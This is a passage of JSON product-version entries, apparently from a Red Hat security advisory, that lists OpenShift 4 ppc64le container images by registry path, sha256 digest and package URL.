"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3Af3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3A9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Aaa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3Ae04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Aa13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Aadedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3Ad83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3Abf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3Ad0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3Acff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3A27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3Ac68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3Ab46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3A622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
